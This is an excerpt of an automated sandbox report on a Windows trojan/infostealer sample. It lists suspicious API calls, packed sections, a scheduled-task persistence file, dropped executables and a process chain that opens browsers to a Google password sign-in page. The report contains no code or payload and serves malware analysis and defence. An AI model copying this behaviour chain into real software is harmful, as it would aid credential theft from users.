Code function: 21_2_00DBD5EB: CreateFileW,DeviceIoControl,CloseHandle,

21_2_00DBD5EB

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DB1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

21_2_00DB1201

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DBE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

21_2_00DBE8F6

Source: C:\Users\user\Desktop\pud8g3zixE.exe

File created: C:\Windows\Tasks\svoutse.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008D7CB3	15_2_008D7CB3
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008A4CF0	15_2_008A4CF0
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008E758B	15_2_008E758B
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008E76AB	15_2_008E76AB
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008A4AF0	15_2_008A4AF0
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008E6E39	15_2_008E6E39
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008E8650	15_2_008E8650
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008E2F98	15_2_008E2F98
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008E2B00	15_2_008E2B00
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D5BF40	21_2_00D5BF40
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC2046	21_2_00DC2046
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D58060	21_2_00D58060
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DB8298	21_2_00DB8298
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D8E4FF	21_2_00D8E4FF
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D8676B	21_2_00D8676B
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DE4873	21_2_00DE4873
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D5CAF0	21_2_00D5CAF0
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D7CAA0	21_2_00D7CAA0
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D6CC39	21_2_00D6CC39
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D86DD9	21_2_00D86DD9
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D591C0	21_2_00D591C0
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D6B119	21_2_00D6B119
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D71394	21_2_00D71394
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D71706	21_2_00D71706
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D7781B	21_2_00D7781B
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D719B0	21_2_00D719B0
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D6997D	21_2_00D6997D
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D57920	21_2_00D57920
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D77A4A	21_2_00D77A4A
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D77CA7	21_2_00D77CA7
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D71C77	21_2_00D71C77
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D89EEE	21_2_00D89EEE
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DDBE44	21_2_00DDBE44
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D71F32	21_2_00D71F32
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 39_2_000001E51AA094F7	39_2_000001E51AA094F7
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 39_2_000001E51AA23472	39_2_000001E51AA23472
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 39_2_000001E51AA234B2	39_2_000001E51AA234B2
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 39_2_000001E51AA23B9C	39_2_000001E51AA23B9C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy) 1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: String function: 00D6F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: String function: 00D70A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: String function: 00D59CB3 appears 31 times

Source: pud8g3zixE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: pud8g3zixE.exe	Static PE information: Section: ZLIB complexity 0.9993703039617486
Source: pud8g3zixE.exe	Static PE information: Section: deetcwmf ZLIB complexity 0.9947828739724016
Source: svoutse.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9993703039617486
Source: svoutse.exe.0.dr	Static PE information: Section: deetcwmf ZLIB complexity 0.9947828739724016
Source: random[1].exe.15.dr	Static PE information: Section: dnbdzjvd ZLIB complexity 0.9949341572903823
Source: 76251a0626.exe.15.dr	Static PE information: Section: dnbdzjvd ZLIB complexity 0.9949341572903823
Source: 88b8632b35.exe.15.dr	Static PE information: Section: dnbdzjvd ZLIB complexity 0.9949341572903823

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@80/201@60/28

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DC37B5 GetLastError,FormatMessageW,

21_2_00DC37B5

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DB10BF AdjustTokenPrivileges,CloseHandle,		21_2_00DB10BF
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DB16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		21_2_00DB16C3

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DC51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

21_2_00DC51CD

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DBD4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

21_2_00DBD4DC

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DC648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

21_2_00DC648E

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

21_2_00D542A2

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

File created: C:\Users\user\AppData\Roaming\1000026000\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\pud8g3zixE.exe

File created: C:\Users\user~1\AppData\Local\Temp\0e8d0864aa

Jump to behavior

Source: C:\Users\user\Desktop\pud8g3zixE.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\pud8g3zixE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT sum(count) FROM events;
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT sum(count) FROM events;9'
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT sum(count) FROM events;9
Source: firefox.exe, 00000019.00000003.2065750582.000001EBFE8B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);

Source: pud8g3zixE.exe	ReversingLabs: Detection: 78%
Source: pud8g3zixE.exe	Virustotal: Detection: 74%

Source: pud8g3zixE.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: svoutse.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: svoutse.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: svoutse.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 76251a0626.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 88b8632b35.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\pud8g3zixE.exe

File read: C:\Users\user\Desktop\pud8g3zixE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pud8g3zixE.exe "C:\Users\user\Desktop\pud8g3zixE.exe"
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process created: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe "C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe"
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe "C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe"
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2068,i,15318855632718478656,17962543240319232679,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe "C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2180 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29d0c8ec-f242-474c-a604-20d6ab7d4c7d} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebe1c6db10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6876 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7012 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7928 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8084 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2988 -parentBuildID 20230927232528 -prefsHandle 4092 -prefMapHandle 4140 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c0f5f11-3af4-44b2-a420-af88b8d55af5} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebf3d76b10 rdd
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process created: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe "C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe "C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe "C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2068,i,15318855632718478656,17962543240319232679,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2180 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29d0c8ec-f242-474c-a604-20d6ab7d4c7d} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebe1c6db10 socket	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2988 -parentBuildID 20230927232528 -prefsHandle 4092 -prefMapHandle 4140 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c0f5f11-3af4-44b2-a420-af88b8d55af5} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebf3d76b10 rdd	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6876 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7012 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7928 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8084 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: ntmarta.dll	Jump to behavior
